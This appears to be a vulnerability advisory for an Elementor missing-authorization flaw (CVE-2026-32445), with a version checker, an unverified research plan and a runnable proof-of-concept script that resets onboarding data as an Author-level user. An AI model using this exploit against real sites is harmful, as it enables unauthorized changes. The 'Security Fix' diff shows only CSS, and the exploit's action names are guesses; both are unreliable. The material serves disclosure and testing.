CVE-2026-32445

Elementor Website Builder <= 3.35.5 - Missing Authorization

Severity: Medium (Missing Authorization)
CVSS Score: 4.3
Patched in: 3.35.6
Time to patch: 40 days

Description

The Elementor Website Builder plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 3.35.5. This makes it possible for authenticated attackers, with author-level access and above, to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None

Technical Details

Affected versions: <= 3.35.5
Published: March 7, 2026
Last updated: April 15, 2026
Affected plugin: elementor
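As an added check, not code from this page or from Elementor: a small script that reads the standard WordPress plugin header and decides whether the installed copy is inside the affected range stated above (<= 3.35.5, fixed in 3.35.6). It also avoids the string-comparison trap where "3.35.10" sorts below "3.35.5". The plugin directory path and main-file name are assumptions; the sample header is constructed.

```python
# Added example, not code from the page or from Elementor: decide whether an
# installed copy of the plugin is inside the affected range stated above
# (<= 3.35.5, fixed in 3.35.6) by reading the standard WordPress plugin header.
# The plugin directory path and the main-file name are assumptions.
import re
from pathlib import Path
from typing import Optional, Tuple

AFFECTED_MAX = "3.35.5"   # last vulnerable release per this page
FIXED_IN = "3.35.6"       # first patched release per this page

# Matches "Version: 3.35.5" inside the /* Plugin Name: ... */ header comment.
HEADER_RE = re.compile(r"^[ \t/*#]*Version:[ \t]*([0-9][^\s]*)",
                       re.MULTILINE | re.IGNORECASE)


def parse_version(v: str) -> Tuple[Tuple[int, ...], int]:
    """Turn '3.35.5' into a sortable key.

    Plain string comparison gets this wrong ('3.35.10' < '3.35.5' as strings),
    so split on dots, pad to three numeric components and rank a pre-release
    suffix ('3.36.0-beta1') below the matching release.
    """
    core, _, pre = v.partition("-")
    parts = [int(p) for p in core.split(".")]
    parts += [0] * (3 - len(parts))
    return tuple(parts[:3]), (0 if pre else 1)


def is_affected(version: str) -> bool:
    """True when version <= AFFECTED_MAX, i.e. it predates the fix."""
    return parse_version(version) <= parse_version(AFFECTED_MAX)


def version_from_header(text: str) -> Optional[str]:
    """Extract the Version: field from plugin-header text, or None."""
    m = HEADER_RE.search(text)
    return m.group(1) if m else None


def check_plugin(plugin_dir: str, main_file: str = "elementor.php") -> Tuple[Optional[str], Optional[bool]]:
    """Read <plugin_dir>/<main_file> and return (version, affected?).

    (None, None) means no version header was found; a scanner should report
    that rather than silently treat the install as safe.
    """
    path = Path(plugin_dir) / main_file
    if not path.is_file():
        return None, None
    version = version_from_header(path.read_text(encoding="utf-8", errors="replace"))
    if version is None:
        return None, None
    return version, is_affected(version)


# Constructed sample of an Elementor-style plugin header (not the real file).
SAMPLE_HEADER = """<?php
/**
 * Plugin Name: Elementor
 * Description: Example header used for the check.
 * Version: 3.35.5
 * Author: Elementor.com
 */
"""


def demo() -> Tuple[Optional[str], Optional[bool]]:
    """Run the check against the constructed sample header."""
    v = version_from_header(SAMPLE_HEADER)
    return v, (is_affected(v) if v else None)


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "wp-content/plugins/elementor"  # assumed path
    print(check_plugin(target))
```

Run it with the plugin directory as the only argument; `(None, None)` means the header could not be read and the result should be treated as unknown, not as patched.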

What Changed in the Fix

Changes introduced in v3.35.6


Source Code

WordPress.org SVN
Research Plan (Unverified)


Elementor Website Builder <= 3.35.5 - Missing Authorization (CVE-2026-32445) Research Plan

1. Vulnerability Summary

The Elementor Website Builder plugin (versions up to 3.35.5) contains a missing authorization vulnerability in its Onboarding module. Specifically, an AJAX handler registered under the elementor_ajax action fails to perform a sufficient capability check (e.g., manage_options). This allows authenticated users with Author-level access (capability edit_posts) to execute privileged actions related to site onboarding and experiments, such as resetting the onboarding wizard or clearing configuration data.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: elementor_ajax
  • Sub-Action: onboarding_reset_onboarding (inferred from JS clearAllOnboardingData) or onboarding_update_step.
  • Method: POST
  • Parameters:
    • action: elementor_ajax
    • actions: A JSON-encoded string containing the sub-action and its data.
    • _nonce: A valid AJAX nonce obtained from the page context.
  • Authentication: Authenticated (Author role or higher).
  • Preconditions: Elementor must be active, and the onboarding process should have been initiated or completed (to see the effect of the reset).

3. Code Flow

  1. Entry Point: The request hits admin-ajax.php with action=elementor_ajax.
  2. AJAX Manager: WordPress dispatches to Elementor\Core\Common\Modules\Ajax\Module::handle_ajax().
  3. Global Check: The handle_ajax function typically checks if the user has the edit_posts capability (default for Authors).
  4. Sub-action Dispatch: The manager iterates through the actions JSON array. For an action like onboarding_reset_onboarding, it looks for the handler in the Onboarding module.
  5. Vulnerable Sink: The handler function in Elementor\App\Modules\Onboarding\Module (likely named ajax_onboarding_reset_onboarding or similar) executes logic to delete options (e.g., delete_option( 'elementor_onboarding_data' )) without verifying that the user has manage_options permissions.

4. Nonce Acquisition Strategy

The elementor_ajax endpoint requires a nonce. In Elementor, this nonce is localized for authenticated users and accessible via the elementorCommonConfig JavaScript object.

  1. Access Point: Log in as an Author and navigate to the WordPress Dashboard (/wp-admin/) or the Elementor Editor for a post.
  2. Extraction: Use browser_eval to extract the nonce from the global JS configuration.
  3. JS Variable: window.elementorCommonConfig?.ajax?.nonce or window.elementorAdminConfig?.ajax?.nonce.

5. Exploitation Strategy

Step 1: Authentication

Authenticate as a user with the Author role.

Step 2: Nonce Extraction

Navigate to /wp-admin/ and execute:

browser_eval("window.elementorCommonConfig?.ajax?.nonce || window.elementorAdminConfig?.ajax?.nonce")

Step 3: Send Malicious AJAX Request

Send a POST request to admin-ajax.php to reset the onboarding data.

  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Body:
    action=elementor_ajax&_nonce=[EXTRACTED_NONCE]&actions={"onboarding_reset_onboarding":{"action":"onboarding_reset_onboarding","data":{}}}
    
    (Note: The sub-action name onboarding_reset_onboarding is inferred from the JS call clearAllOnboardingData found in the bundle; it has not been confirmed against the server-side handler registrations.)

6. Test Data Setup

  1. Plugin Installation: Install and activate Elementor 3.35.5.
  2. Complete Onboarding: As an Admin, complete the Elementor onboarding wizard or manually set the option:
    wp option update elementor_onboarding_data '{"completed":true,"step":"done"}'
  3. Create Author: Create a user with the Author role.
    wp user create attacker attacker@example.com --role=author --user_pass=password

7. Expected Results

  • HTTP Response: Status 200 OK.
  • JSON Response: {"success":true,"data":{"responses":{"onboarding_reset_onboarding":{"success":true,"data":[]}}}}
  • Database Effect: The elementor_onboarding_data option will be deleted or its completed status will be set to false.

8. Verification Steps

After the exploit, use WP-CLI to check if the onboarding state was reset:

wp option get elementor_onboarding_data

If the exploit worked, this command should either return an error (option not found) or show that the "completed" status is missing/false.

9. Alternative Approaches

If onboarding_reset_onboarding is not the correct action name, try the following sub-actions often found in Elementor's Onboarding/Experiments modules:

  • onboarding_set_step with data={"step": "1"}
  • onboarding_init_maybe
  • onboarding_complete_step
  • elementor_reset_experiments (related to clearExperimentData in the JS bundle)

Example Alternative Payload:

actions={"onboarding_set_step":{"action":"onboarding_set_step","data":{"step":"1"}}}

Reference the JS localization keys from assets/js/357684d6580904fc0a95.bundle.min.js:

  • STEP4_SITE_STARTER_CHOICE
  • EDITOR_LOAD_TRACKED
  • POST_ONBOARDING_CLICK_COUNT
Research Findings
Static analysis — not yet PoC-verified

Summary

The Elementor Website Builder plugin for WordPress fails to perform a sufficient capability check within its Onboarding module in versions up to 3.35.5. This allows authenticated attackers with Author-level permissions or higher to execute administrative actions, such as resetting site onboarding data or clearing configuration experiments, via the elementor_ajax endpoint.

Security Fix

diff -ru /home/deploy/wp-safety.org/data/plugin-versions/elementor/3.35.5/assets/css/admin.css /home/deploy/wp-safety.org/data/plugin-versions/elementor/3.35.6/assets/css/admin.css
--- /home/deploy/wp-safety.org/data/plugin-versions/elementor/3.35.5/assets/css/admin.css	2026-02-17 14:41:42.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/elementor/3.35.6/assets/css/admin.css	2026-03-03 14:49:18.000000000 +0000
@@ -2271,6 +2271,46 @@
   font-weight: 500;
 }
 
+#e-dashboard-ally .ui-sortable-handle {
+  justify-content: flex-start;
+  gap: 8px;
+}
+
+#dashboard-widgets .e-dashboard-ally {
+  padding: 28px 0;
+}
+#dashboard-widgets .e-dashboard-ally .e-dashboard-ally-img {
+  text-align: center;
+  margin-block-end: 16px;
+}
+#dashboard-widgets .e-dashboard-ally .e-dashboard-ally-info {
+  display: flex;
+  flex-direction: column;
+  align-items: center;
+  text-align: center;
+  margin-block-end: 20px;
+}
+#dashboard-widgets .e-dashboard-ally .e-dashboard-ally-title {
+  font-size: 20px;
+  line-height: 32px;
+  color: #0C0D0E;
+  margin-block-end: 0;
+}
+#dashboard-widgets .e-dashboard-ally .e-dashboard-ally-description {
+  max-width: 295px;
+  font-size: 14px;
+  line-height: 20px;
+  color: #3F444B;
+  margin: 0 0 16px;
+}
+
+label[for=e-dashboard-ally-hide] svg {
+  display: inline-block;
+  vertical-align: middle;
+  margin-inline-end: 4px;
+  margin-block-end: 2px;
+}
+
 .post-type-elementor_library #elementor-template-library-tabs-wrapper {
   padding-block-start: 2em;
   margin-block-end: 2em; ... (truncated)
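Review bot: The hunk shown (assets/css/admin.css, @@ -2271,6 +2271,46 @@) adds only styling for the `#e-dashboard-ally` dashboard widget and contains no capability check or other authorization logic, so it does not evidence the Missing Authorization fix this page attributes to 3.35.6. Filter the displayed diff to the PHP files of the Onboarding module (the page's own code-flow section points at `Elementor\App\Modules\Onboarding\Module`) so the reader can see where `current_user_can(...)` was added; if the 3.35.5 to 3.35.6 diff has no such hunk, the Security Fix section should state that rather than present CSS as the fix.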

Exploit Outline

The exploit leverages the `elementor_ajax` endpoint, which handles multiple actions in a single request and is typically accessible to users with the `edit_posts` capability (Authors).

1. **Authentication**: The attacker authenticates with an Author-level account.
2. **Nonce Retrieval**: The attacker extracts the AJAX security nonce from the global JavaScript configuration object `elementorCommonConfig` (specifically `elementorCommonConfig.ajax.nonce`) found in the WordPress admin dashboard.
3. **Request Crafting**: The attacker sends a POST request to `/wp-admin/admin-ajax.php` with the following parameters:
   - `action`: `elementor_ajax`
   - `_nonce`: The retrieved security nonce.
   - `actions`: A JSON object containing privileged sub-actions from the Onboarding module, such as `{"onboarding_reset_onboarding":{"action":"onboarding_reset_onboarding","data":{}}}`.
4. **Execution**: Because the backend handler for `onboarding_reset_onboarding` lacks a `manage_options` capability check, it processes the request and deletes or modifies the targeted configuration options.
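The exchange above, and the same procedure in sections 4 to 8 of the research plan (nonce extraction, the batched `actions` body, the response envelope from section 7), as one added harness that is not code from this page or from Elementor. Everything it relies on is an assumption carried over from the page, which marks them unverified: the sub-action name `onboarding_reset_onboarding`, the inline `var elementorCommonConfig = {...};` script that carries `ajax.nonce` on admin pages, and the `http://localhost:8080` target with the `attacker` Author account from the test-data setup. The HTML and JSON samples are constructed so the parsing parts run offline.

```python
# Added example, not code from the page or from Elementor: a harness for the
# elementor_ajax exchange described in the research plan (sections 4-8) and
# the Exploit Outline. Assumptions taken from the page, which marks them
# unverified: the sub-action name, the `var elementorCommonConfig = {...};`
# inline script carrying ajax.nonce, and the target URL / Author credentials.
import json
import re
import sys
from http.cookiejar import CookieJar
from typing import Any, Dict, Optional, Tuple
from urllib import error, parse, request

# wp_localize_script-style output: `var elementorCommonConfig = {...};`.
# Non-greedy match stops at the first "};", which is fine unless a string
# value inside the object itself contains "};".
CONFIG_RE = re.compile(r"var\s+elementorCommonConfig\s*=\s*(\{.*?\});", re.DOTALL)


def extract_nonce(html: str) -> Optional[str]:
    """Return elementorCommonConfig.ajax.nonce from an admin page, else None."""
    m = CONFIG_RE.search(html)
    if not m:
        return None
    try:
        cfg = json.loads(m.group(1))
    except json.JSONDecodeError:
        return None
    return cfg.get("ajax", {}).get("nonce")


def build_actions(sub_action: str, data: Optional[Dict[str, Any]] = None,
                  request_id: Optional[str] = None) -> str:
    """elementor_ajax batches sub-actions: `actions` is a JSON object keyed by a
    client-chosen id, each value {"action": ..., "data": ...}."""
    return json.dumps({request_id or sub_action: {"action": sub_action, "data": data or {}}})


def build_body(nonce: str, actions_json: str) -> bytes:
    """Form-encode the three fields the page lists: action, _nonce, actions."""
    return parse.urlencode({"action": "elementor_ajax", "_nonce": nonce,
                            "actions": actions_json}).encode()


def parse_responses(body: str) -> Dict[str, Tuple[bool, Any]]:
    """Flatten {"success":..,"data":{"responses":{id:{success,data}}}} into
    {id: (success, data)}. A failed outer envelope (e.g. rejected nonce) is
    raised rather than returned, since no sub-action ran."""
    env = json.loads(body)
    if not env.get("success"):
        raise RuntimeError(f"elementor_ajax rejected the request: {env.get('data')!r}")
    responses = env.get("data", {}).get("responses", {})
    return {rid: (bool(r.get("success")), r.get("data")) for rid, r in responses.items()}


def wp_login(opener, base: str, user: str, password: str) -> None:
    """Cookie login through the standard wp-login.php form."""
    opener.open(base + "/wp-login.php")  # GET first so the test cookie is set
    form = parse.urlencode({"log": user, "pwd": password, "wp-submit": "Log In",
                            "redirect_to": base + "/wp-admin/", "testcookie": "1"}).encode()
    opener.open(base + "/wp-login.php", data=form)


def run(base: str = "http://localhost:8080", user: str = "attacker", password: str = "password",
        sub_action: str = "onboarding_reset_onboarding") -> Dict[str, Tuple[bool, Any]]:
    """Log in as the Author, pull the nonce from /wp-admin/, send the sub-action."""
    opener = request.build_opener(request.HTTPCookieProcessor(CookieJar()))
    wp_login(opener, base, user, password)
    html = opener.open(base + "/wp-admin/").read().decode("utf-8", "replace")
    nonce = extract_nonce(html)
    if not nonce:
        raise RuntimeError("elementorCommonConfig.ajax.nonce not found on /wp-admin/")
    req = request.Request(base + "/wp-admin/admin-ajax.php",
                          data=build_body(nonce, build_actions(sub_action)),
                          headers={"Content-Type": "application/x-www-form-urlencoded"})
    try:
        with opener.open(req) as resp:
            body = resp.read()
    except error.HTTPError as e:  # WordPress returns JSON errors with a 4xx status
        body = e.read()
    return parse_responses(body.decode("utf-8", "replace"))


# Constructed samples (not captured from a real site) so parsing runs offline.
SAMPLE_ADMIN_HTML = ('<script>var elementorCommonConfig = {"ajax":{"url":"/wp-admin/admin-ajax.php",'
                     '"nonce":"a1b2c3d4e5"},"isRTL":false};</script>')
SAMPLE_RESPONSE = ('{"success":true,"data":{"responses":'
                   '{"onboarding_reset_onboarding":{"success":true,"data":[]}}}}')


def demo() -> Dict[str, Tuple[bool, Any]]:
    """Exercise the offline parts against the constructed samples."""
    nonce = extract_nonce(SAMPLE_ADMIN_HTML)
    assert nonce == "a1b2c3d4e5"
    build_body(nonce, build_actions("onboarding_reset_onboarding"))
    return parse_responses(SAMPLE_RESPONSE)


if __name__ == "__main__":
    print(run(*sys.argv[1:]) if len(sys.argv) > 1 else demo())
```

Without arguments the script only runs the offline demo; `python poc.py http://localhost:8080 attacker password onboarding_reset_onboarding` performs the live exchange against the lab target from the test-data setup, after which `wp option get elementor_onboarding_data` (section 8) tells you whether the sub-action name guessed by the plan was the right one.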
